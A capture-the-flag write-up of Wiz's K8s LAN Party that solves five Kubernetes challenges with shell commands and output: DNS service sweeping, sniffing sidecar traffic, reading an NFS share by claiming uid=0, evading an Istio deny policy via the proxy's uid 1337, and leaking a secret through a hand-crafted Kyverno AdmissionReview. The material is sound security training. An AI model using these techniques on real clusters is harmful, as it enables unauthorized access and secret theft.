K8S_LAN_PARTY_WriteUp

Background

URL

https://k8slanparty.com/

Time

March 20, 2024 6:30 PM - March 22, 2024 10:30 PM

Challenge 1: RECON

Description

As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have loaded your machine with dnscan to ease this process for further challenges.

Key Concepts

  • dnscan
  • Service-to-IP mapping
  • curl

Analysis

  1. Clicking the DNS scanning link, we're greeted with:

We actually have access to a Kubernetes specific way to identify live services and sometimes pods in the form of the Kubernetes DNS service.

In other words: probe for services via DNS.

A Service is assigned a cluster-internal IP (the ClusterIP), which is used inside the cluster to route traffic to the backing Pods; a ClusterIP is not reachable from the public internet. DNS records associated with a Service allow it to be reached by name, and these records are managed by the cluster's DNS resolver.

Pod and Service DNS names are generated automatically as follows:

  • Pod: pod-ip-address.pod-namespace-name.pod.cluster-domain.example (e.g. 10-244-0-1.my-app.pod.cluster.local, with the IP's dots replaced by dashes)
  • Service: service-name.service-namespace-name.svc.cluster-domain.example (e.g. database.my-app.svc.cluster.local)
  1. So the plan: run dnscan against the subnet of the KUBERNETES_SERVICE_HOST IP from the environment variables, and reverse-resolve the corresponding Services.
player@wiz-k8s-lan-party:~$ env | grep HOST
KUBERNETES_SERVICE_HOST=10.100.0.1
player@wiz-k8s-lan-party:~$ dnscan -h
Usage of dnscan:
-subnet string
Input to scan, CIDR notation (e.g., 10.5.0.0/24) or wildcard (e.g., 10.5.0.*)
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
34967 / 65536 [------------------------------------------------------------------------->________________________________________________________________] 53.36% 988 p/s10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
65415 / 65536 [----------------------------------------------------------------------------------------------------------------------------------------->] 99.82% 988 p/s10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.
65536 / 65536 [-----------------------------------------------------------------------------------------------------------------------------------------] 100.00% 991 p/s

Found the service: getflag-service.k8s-lan-party.svc.cluster.local.
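Under the hood, dnscan's sweep boils down to a reverse (PTR) lookup for every IP in the subnet; the cluster DNS answers PTR queries for Service ClusterIPs. A minimal Python sketch of the idea (illustrative only, not the actual dnscan source; the lookups succeed only from inside the cluster):

```python
import ipaddress
import socket

def candidate_ips(cidr: str):
    """Expand a CIDR into the individual addresses to probe."""
    return [str(ip) for ip in ipaddress.ip_network(cidr, strict=False)]

def reverse_lookup(ip: str):
    """PTR lookup; inside the cluster, Service ClusterIPs resolve to
    names like <service>.<namespace>.svc.cluster.local."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None

if __name__ == "__main__":
    ips = candidate_ips("10.100.0.0/16")   # the subnet dnscan swept above
    print(len(ips), "addresses to probe")  # 65536, matching dnscan's total
```

In the challenge pod you would loop reverse_lookup over ips and print any hits, which is exactly the `10.100.136.254 -> getflag-service...` line dnscan produced.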

  1. After some thought without a follow-up exploit in mind, I checked the environment variables, which show port 443. In the end, just access the service directly by its DNS name: getflag-service.
player@wiz-k8s-lan-party:~$ env
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
USER_ID=063cd108-777e-421c-8c5b-ef053f624672
HISTSIZE=2048
PWD=/home/player
HOME=/home/player
KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
HISTFILE=/home/player/.bash_history
TMPDIR=/tmp
TERM=xterm-256color
SHLVL=1
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
KUBERNETES_SERVICE_HOST=10.100.0.1
KUBERNETES_PORT=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
HISTFILESIZE=2048
_=/usr/bin/env

# good old curl
player@wiz-k8s-lan-party:~$ curl getflag-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{between-thousands-of-ips-you-found-your-northen-star}

Appendix

https://mp.weixin.qq.com/s?__biz=MzkwMDQ4MDU2MA==&mid=2247484222&idx=1&sn=5a1b2d72398280542e75c5310c6b1d19&scene=21#wechat_redirect

Challenge 2: FINDING NEIGHBOURS

Description

Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.

Key Concepts

  • sidecars (network)
  • netstat
  • tcpdump

Analysis

  1. First, open the sidecars link to see what it's about:

Sidecar containers are the secondary containers that run along with the main application container within the same Pod. These containers are used to enhance or to extend the functionality of the main application container by providing additional services, or functionality such as logging, monitoring, security, or data synchronization, without directly altering the primary application code.

Essentially an auxiliary container that provides additional or extended functionality.

If an init container is created with its restartPolicy set to Always, it will start and remain running during the entire life of the Pod. This can be helpful for running supporting services separated from the main application containers.

Once restartPolicy: Always is set, the sidecar starts with the Pod and keeps running for its entire lifetime.

  1. Hint 1

Sidecar containers share the same lifecycle, resources, and network namespace with the primary container. This co-location allows them to interact closely and share resources.

That is, they share the same network namespace and storage with the main container.

  1. Information gathering
  • service
player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
65395 / 65536 [->] 99.78% 988 p/s10.100.171.123 -> reporting-service.k8s-lan-party.svc.cluster.local.
  • network
player@wiz-k8s-lan-party:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
2113: ns-252e81@if2114: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 06:27:94:7c:7d:aa brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.8.215/31 scope global ns-252e81
valid_lft forever preferred_lft forever
inet6 fe80::427:94ff:fe7c:7daa/64 scope link
valid_lft forever preferred_lft forever
  • netstat
player@wiz-k8s-lan-party:~$ netstat -ano 
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 192.168.8.215:45366 10.100.171.123:80 TIME_WAIT timewait (30.31/0/0)
tcp 0 0 192.168.8.215:34758 10.100.171.123:80 TIME_WAIT timewait (50.36/0/0)
tcp 0 0 192.168.8.215:39366 10.100.171.123:80 TIME_WAIT timewait (40.44/0/0)
tcp 0 0 192.168.8.215:36266 10.100.171.123:80 TIME_WAIT timewait (20.28/0/0)
tcp 0 0 192.168.8.215:43638 10.100.171.123:80 TIME_WAIT timewait (15.27/0/0)
tcp 0 0 192.168.8.215:34772 10.100.171.123:80 TIME_WAIT timewait (50.46/0/0)
tcp 0 0 192.168.8.215:45368 10.100.171.123:80 TIME_WAIT timewait (35.33/0/0)
tcp 0 0 192.168.8.215:34786 10.100.171.123:80 TIME_WAIT timewait (55.48/0/0)
tcp 0 0 192.168.8.215:34780 10.100.171.123:80 TIME_WAIT timewait (55.38/0/0)
tcp 0 0 192.168.8.215:39376 10.100.171.123:80 TIME_WAIT timewait (45.45/0/0)
tcp 0 0 192.168.8.215:42832 10.100.171.123:80 TIME_WAIT timewait (5.24/0/0)
tcp 0 0 192.168.8.215:39370 10.100.171.123:80 TIME_WAIT timewait (45.35/0/0)
tcp 0 0 192.168.8.215:42820 10.100.171.123:80 TIME_WAIT timewait (0.23/0/0)
tcp 0 0 192.168.8.215:36274 10.100.171.123:80 TIME_WAIT timewait (25.30/0/0)
tcp 0 0 192.168.8.215:39362 10.100.171.123:80 TIME_WAIT timewait (40.34/0/0)
tcp 0 0 192.168.8.215:43626 10.100.171.123:80 TIME_WAIT timewait (10.26/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path

The local address 192.168.8.215 keeps connecting to 10.100.171.123:80.

  1. OK, after peeking at a writeup: just capture the traffic with tcpdump and inspect the conversation in detail.
player@wiz-k8s-lan-party:~$ tcpdump host 10.100.171.123  -w 1.pcap
tcpdump: listening on ns-252e81, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C30 packets captured
30 packets received by filter
0 packets dropped by kernel
player@wiz-k8s-lan-party:~$ cat 1.pcap
Ôò¡ïýe«¾
JJ>òVA4#'|}E<6y@EäÀ×
d«{²¢P+SP´
\\Iïýe³À
JJ'|}ª>òVA4E<@|]
d«{À×P²¢»­Ë+SPþ´
¡îù\\Iïýe¾À
BB>òVA4#'|}E46z@EëÀ×
d«{²¢P+SP­Ìö

\\I¡îùïýeìÀ
>òVA4#'|}E
6{@EÀ×
d«{²¢P+SP­Ìö[
\\I¡îùPOST / HTTP/1.1
Host: reporting-service
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded

wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}ïýeÂ
BB'|}ª>òVA4E4á@â
d«{À×P²¢»­Ì+SQtü

¡îú\\IïýeëÊ
'|}ª>òVA4Eá@
d«{À×P²¢»­Ì+SQtüR
¡îü\\IHTTP/1.1 200 OK
server: istio-envoy
date: Fri, 22 Mar 2024 05:11:11 GMT
content-type: text/plain
x-envoy-upstream-service-time: 1
x-envoy-decorator-operation: :0/*
transfer-encoding: chunked

0

wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}
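Instead of cat-ing raw pcap bytes to the terminal, you can pull out just the printable runs, which is roughly what `strings 1.pcap` or Wireshark's Follow TCP Stream would show. A small sketch; the sample bytes here are a stand-in for the real capture:

```python
import re

def printable_strings(data: bytes, min_len: int = 6):
    """Extract runs of printable ASCII from raw bytes, like `strings`."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

# Stand-in for the bytes of 1.pcap captured above:
sample = (b"\xd4\xc3\xb2\xa1\x02\x00POST / HTTP/1.1\r\n"
          b"Host: reporting-service\r\n\x00\x01"
          b"wiz_k8s_lan_party{good-crime-comes-with-a-partner-in-a-sidecar}")

for s in printable_strings(sample):
    print(s)
```

The HTTP request lines and the flag fall out cleanly because they are the only long printable runs in the binary stream.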

Challenge 3: DATA LEAKAGE

Description

Exposed File Share

The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦‍️.

Hint

You may find it useful to look at the documentation for nfs-cat and nfs-ls.

Key Concepts

  • Network File System (NFS)
  • mount
  • nfs-cat, nfs-ls

Analysis

  1. nfs-cat / nfs-ls

    Note the phrase in the description, "this technology was introduced in an era when access control was only network-based", together with the hint's nfs-cat / nfs-ls.

  2. NFS

NFS is short for Network File System, one of the file systems supported by FreeBSD (among many others). NFS allows a system to share directories and files with others over the network; through NFS, users and programs can access files on a remote system as if they were local.

In short: a data-storage server or service that hosts talk to over the NFS protocol, primarily by mounting it.

  1. Check the mounts

player@wiz-k8s-lan-party:/var/run/secrets$ mount | grep nfs    
fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.4.189,local_lock=none,addr=192.168.124.98)

Found something interesting; let's see what this is about.

GPT's explanation:

  • fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com: the remote NFS server address. NFS (Network File System) is a network file-system protocol that lets remote machines share files over the network.
  • :/: the root directory of the remote file system is what gets mounted. Before the colon is the remote server address and shared path; the mount point follows.
  • /efs: the local mount point. Here, the root of the remote NFS file system is mounted at the local /efs directory.
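The interesting detail is buried in the mount options: sec=sys means AUTH_SYS authentication, where the server simply trusts whatever uid/gid the client claims, exactly the "access control was only network-based" era the description jokes about. A quick parse of the options from the mount line above:

```python
mount_line = (
    "fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 "
    "(ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,"
    "proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.4.189,"
    "local_lock=none,addr=192.168.124.98)"
)

# The options are the comma-separated list inside the parentheses.
opts = mount_line.split("(", 1)[1].rstrip(")").split(",")
kv = dict(o.split("=", 1) for o in opts if "=" in o)

print(kv["vers"])  # 4.1 -> NFSv4.1
print(kv["sec"])   # sys -> server trusts whatever uid/gid the client sends
```

Those two values (vers=4.1 and sec=sys) are what make the uid-spoofing trick below work.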
  1. Finding the flag

player@wiz-k8s-lan-party:/var/run/secrets$ cd /efs
player@wiz-k8s-lan-party:/efs$ ls
flag.txt
player@wiz-k8s-lan-party:/efs$ cat flag.txt
cat: flag.txt: Permission denied

Heh.

This recalls the hint's nfs-cat / nfs-ls.

nfs-cat and nfs-ls are common NFS (Network File System) tools for reading file contents and listing directories on an NFS server; they normally require an NFS client to be installed and configured on the machine. After studying the syntax, run:

$ nfs-cat 'nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com/flag.txt'

Not sure if it was me or the NFS server being down, but it wouldn't connect. Ugh.

Right: read the format carefully; parameters are required too.

player@wiz-k8s-lan-party:~$ nfs-cat 'nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4.1&uid=0'
wiz_k8s_lan_party{old-school-network-file-shares-infiltrated-the-cloud!}
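The only difference from the failing attempt is the query string: libnfs reads parameters like version and uid out of the URL, and because the share uses sec=sys the server believes the uid=0 we claim. A sketch of how the URL breaks down, using Python's urllib for illustration:

```python
from urllib.parse import urlparse, parse_qs

url = ("nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com"
       "//flag.txt?version=4.1&uid=0")

parts = urlparse(url)
params = {k: v[0] for k, v in parse_qs(parts.query).items()}

print(parts.hostname)  # the EFS server
print(parts.path)      # //flag.txt
print(params)          # version matches vers=4.1 from mount; uid=0 claims root
```

With sec=sys there is no verification of that uid; the client-asserted identity is the whole access-control story.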

Challenge 4: BYPASSING BOUNDARIES

Description

The Beauty and The Ist

Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don’t abuse this power; use it responsibly and with caution.

Hint: Try examining Istio's [IPTables rules](<https://github.com/istio/istio/wiki/Understanding-IPTables-snapshot#use-pid-to-get-iptables>).

Policy given in the challenge:

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: istio-get-flag
  namespace: k8s-lan-party
spec:
  action: DENY
  selector:
    matchLabels:
      app: "{flag-pod-name}"
  rules:
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    to:
    - operation:
        methods: ["POST", "GET"]

A quick ask to GPT: this AuthorizationPolicy DENIES POST and GET requests to the application labeled "{flag-pod-name}" when they originate from the k8s-lan-party namespace.
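Modeled as plain logic, the policy's effect looks like this (a toy sketch, not Istio code):

```python
def is_denied(source_namespace: str, method: str) -> bool:
    """Toy model of the istio-get-flag AuthorizationPolicy: DENY requests
    to the {flag-pod-name} app when they use POST/GET *and* originate
    from the k8s-lan-party namespace (which is where our pod lives)."""
    return source_namespace == "k8s-lan-party" and method in ("POST", "GET")

print(is_denied("k8s-lan-party", "GET"))   # True: a plain curl from our pod is blocked
print(is_denied("k8s-lan-party", "HEAD"))  # False: other methods are not matched
```

The catch is that the policy is only enforced by the Envoy sidecar, so traffic that never reaches the sidecar is never evaluated at all, which is the loophole this challenge exploits.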

Key Concepts

  • Istio
  • IPTables
  • PID/UID/GID

Analysis

  1. Being dropped into the lab as root immediately makes me think of container escape. Ha.
  2. First, study the Istio and iptables material from the hint.

Istio

Istio is a fully open-source service mesh that layers transparently onto existing distributed applications. It is also a platform exposing APIs that integrate with any logging platform, monitoring system, or policy system. Istio's features let you run a distributed microservice architecture efficiently and provide a uniform way to secure, connect, and monitor microservices.

iptables

iptables is the userspace management tool for netfilter, the firewall framework in the Linux kernel; it is considered part of netfilter as well. Netfilter itself lives in kernel space and provides not only network address translation but also packet mangling and packet filtering.

iptables has five tables, each with a different responsibility (filtering, NAT, packet mangling, raw processing, and security/access control), and each table holds a different set of chains (input, output, and so on).

Take the filter table as an example:

$ iptables -L -v
Chain INPUT (policy ACCEPT 350K packets, 63M bytes)
pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 18M packets, 1916M bytes)
pkts bytes target prot opt in out source destination

We see the three default chains, INPUT, FORWARD, and OUTPUT. The first line of each chain's output shows the chain name followed by its default policy (ACCEPT).

Each chain can contain multiple rules, evaluated in order from top to bottom. The column headers mean:

  • pkts: number of matched packets processed
  • bytes: cumulative size of matched packets, in bytes
  • target: the target executed when a packet matches the rule
  • prot: protocol, e.g. tcp, udp, icmp, or all
  • opt: rarely used; shows IP options
  • in: inbound interface
  • out: outbound interface
  • source: source IP address or subnet of the traffic, or anywhere
  • destination: destination IP address or subnet of the traffic, or anywhere

Information gathering

  • service: dnscan sweep
istio-protected-pod-service.k8s-lan-party.svc.cluster.local.

Our namespace matches, so the problem is the DENY: requests to the application carrying the {flag-pod-name} label (istio-protected-pod-service) are rejected.

Hint analysis

Key concept: magic constants

1337 - uid and gid used to distinguish between traffic originating from proxy vs the applications.

The important part:

Outbound bypass

  • If you observe the iptables rules above, you will see a magic number (1337) appear several times. This is the uid/gid of the running proxy which is used by iptables to differentiate between packets originating from the proxy and the ones originating from the application. When packets originate from the application, they must be redirected to proxy to implement a service mesh. When packets originate from the proxy, they *must not* be redirected as doing so will cause an infinite loop.

This can cause multiple issues.

If the cluster is not using mTLS, outbound policies (such as data-leak prevention) can be bypassed.
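A toy model of the logic described above (the real thing is Istio's ISTIO_OUTPUT chain in the nat table; uid 1337 and Envoy's outbound port 15001 are Istio defaults):

```python
PROXY_UID = 1337  # istio-proxy's uid/gid, the "magic constant"

def istio_output_verdict(packet_owner_uid: int) -> str:
    """Toy model of the ISTIO_OUTPUT nat chain: packets owned by the
    proxy's uid RETURN (leave the pod untouched); everything else is
    redirected into Envoy, where AuthorizationPolicy is enforced."""
    if packet_owner_uid == PROXY_UID:
        return "RETURN"             # no proxy, no policy check
    return "REDIRECT -> 15001"      # into the sidecar

print(istio_output_verdict(0))      # root's traffic still goes through Envoy
print(istio_output_verdict(1337))   # traffic from uid 1337 skips the mesh entirely
```

So any process we run with uid/gid 1337 talks to the destination directly, and the DENY policy never sees its requests.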

Verification

Check the UIDs:

root@wiz-k8s-lan-party:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
_rpc:x:102:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:103:65534::/var/lib/nfs:/usr/sbin/nologin
istio:x:1337:1337::/home/istio:/bin/sh
player:x:1001:1001::/home/player:/bin/sh

The highlight: istio:x:1337:1337::/home/istio:/bin/sh. The istio user has UID and GID 1337, and since we are currently root, we can simply become it.

Per: https://github.com/istio/istio/issues/4286

Switch to that user, and the DENY is bypassed:

root@wiz-k8s-lan-party:~# su istio
$ id
uid=1337(istio) gid=1337(istio) groups=1337(istio)
$ curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{only-leet-hex0rs-can-play-both-k8s-and-linux}$

Challenge 5: LATERAL MOVEMENT

Description

Who will guard the guardians?

Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.

Hint

Need a hand crafting AdmissionReview requests? Checkout https://github.com/anderseknert/kube-review.

Policy

apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: apply-flag-to-env
  namespace: sensitive-ns
spec:
  rules:
  - name: inject-env-vars
    match:
      resources:
        kinds:
        - Pod
    mutate:
      patchStrategicMerge:
        spec:
          containers:
          - name: "*"
            env:
            - name: FLAG
              value: "{flag}"

Key Concepts

  • Dynamic Admission Control
    • admission webhooks
    • AdmissionReview

Analysis

  1. Study the description and the hint

Webhook request and response

  • webhooks can specify what versions of AdmissionReview objects they accept with the admissionReviewVersions field in their configuration

In short, it's a request/response protocol: you can't just fire an arbitrary request; you need to construct a valid AdmissionReview JSON body.

When allowing a request, a mutating admission webhook may optionally modify the incoming object as well. This is done using the patch and patchType fields in the response. The only currently supported patchType is JSONPatch. For patchType: JSONPatch, the patch field contains a base64-encoded array of JSON patch operations.
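A sketch of assembling a minimal AdmissionReview by hand (names like psych-pod are arbitrary; the kube-review tool from the hint generates the same shape automatically):

```python
import json
import uuid

# A Pod manifest in the namespace the Kyverno policy matches (sensitive-ns).
pod = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "psych-pod", "namespace": "sensitive-ns"},
    "spec": {"containers": [{
        "name": "psych-container",
        "image": "nginx",
        "env": [{"name": "FLAG", "value": "{flag}"}],  # placeholder the webhook mutates
    }]},
}

# Wrap it the way the API server would when calling the webhook.
review = {
    "apiVersion": "admission.k8s.io/v1",
    "kind": "AdmissionReview",
    "request": {
        "uid": str(uuid.uuid4()),
        "kind": {"group": "", "version": "v1", "kind": "Pod"},
        "resource": {"group": "", "version": "v1", "resource": "pods"},
        "namespace": "sensitive-ns",
        "operation": "CREATE",
        "object": pod,
        "dryRun": True,
    },
}

body = json.dumps(review)  # POST this to the webhook's mutate endpoint
print(body[:60] + "...")
```

Because we talk to the webhook directly rather than through the API server, nothing validates who we are; the webhook just mutates the object and hands back the patch.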

  1. Information gathering

Service

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.1/16
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.
kyverno-cleanup-controller.kyverno.svc.cluster.local.

Not 100% sure of the internals, but: POST an AdmissionReview JSON built from the given Policy's match to the webhook, and it returns the patch.

player@wiz-k8s-lan-party:~$ curl -k -X POST https://kyverno-svc.kyverno.svc.cluster.local/mutate -H "Content-Type: application/json" --data '{"apiVersion":"admission.k8s.io/v1","kind":"AdmissionReview","request":{"uid":"2024ee9c-c374-413c-838d-e62bcb4826be","kind":{"group":"","version":"v1","kind":"Pod"},"resource":{"group":"","version":"v1","resource":"pods"},"requestKind":{"group":"","version":"v1","kind":"Pod"},"requestResource":{"group":"","version":"v1","resource":"pods"},"name":"example-pod","namespace":"sensitive-ns","operation":"CREATE","userInfo":{"username":"psych","uid":"xxx","groups":["system:authenticated"]},"object":{"apiVersion":"v1","kind":"Pod","metadata":{"name":"psych-pod","namespace":"sensitive-ns"},"spec":{"containers":[{"name":"psych-container","image":"nginx","env":[{"name":"FLAG","value":"{flag}"}]}]}},"oldObject":null,"options":{"apiVersion":"meta.k8s.io/v1","kind":"CreateOptions"},"dryRun":true}}'
{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"2024ee9c-c374-413c-838d-e62bcb4826be","kind":{"group":"","version":"v1","kind":"Pod"},"resource":{"group":"","version":"v1","resource":"pods"},"requestKind":{"group":"","version":"v1","kind":"Pod"},"requestResource":{"group":"","version":"v1","resource":"pods"},"name":"example-pod","namespace":"sensitive-ns","operation":"CREATE","userInfo":{"username":"psych","uid":"xxx","groups":["system:authenticated"]},"object":{"apiVersion":"v1","kind":"Pod","metadata":{"name":"psych-pod","namespace":"sensitive-ns"},"spec":{"containers":[{"name":"psych-container","image":"nginx","env":[{"name":"FLAG","value":"{flag}"}]}]}},"oldObject":null,"dryRun":true,"options":{"apiVersion":"meta.k8s.io/v1","kind":"CreateOptions"}},"response":{"uid":"2024ee9c-c374-413c-838d-e62bcb4826be","allowed":true,"patch":"W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d","patchType":"JSONPatch"}}

Base64-decoding the patch value from the response:

[{"op":"replace","path":"/spec/containers/0/env/0/value","value":"wiz_k8s_lan_party{you-are-k8s-net-master-with-great-power-to-mutate-your-way-to-victory}"}, {"path":"/metadata/annotations","op":"add","value":{"policies.kyverno.io/last-applied-patches":"inject-env-vars.apply-flag-to-env.kyverno.io: replaced /spec/containers/0/env/0/value\n"}}]
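The same decode, scripted; the patch string is taken verbatim from the webhook response above:

```python
import base64
import json

# "patch" field from the AdmissionReview response:
patch_b64 = ("W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoi"
             "d2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7"
             "InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d")

# Defensive padding, in case the copy-pasted string lost trailing '='.
ops = json.loads(base64.b64decode(patch_b64 + "=" * (-len(patch_b64) % 4)))
for op in ops:
    print(op["op"], op["path"])
print(ops[0]["value"])  # the flag
```

The first JSONPatch op is the mutation the policy promised: it replaces our placeholder FLAG env value with the real flag.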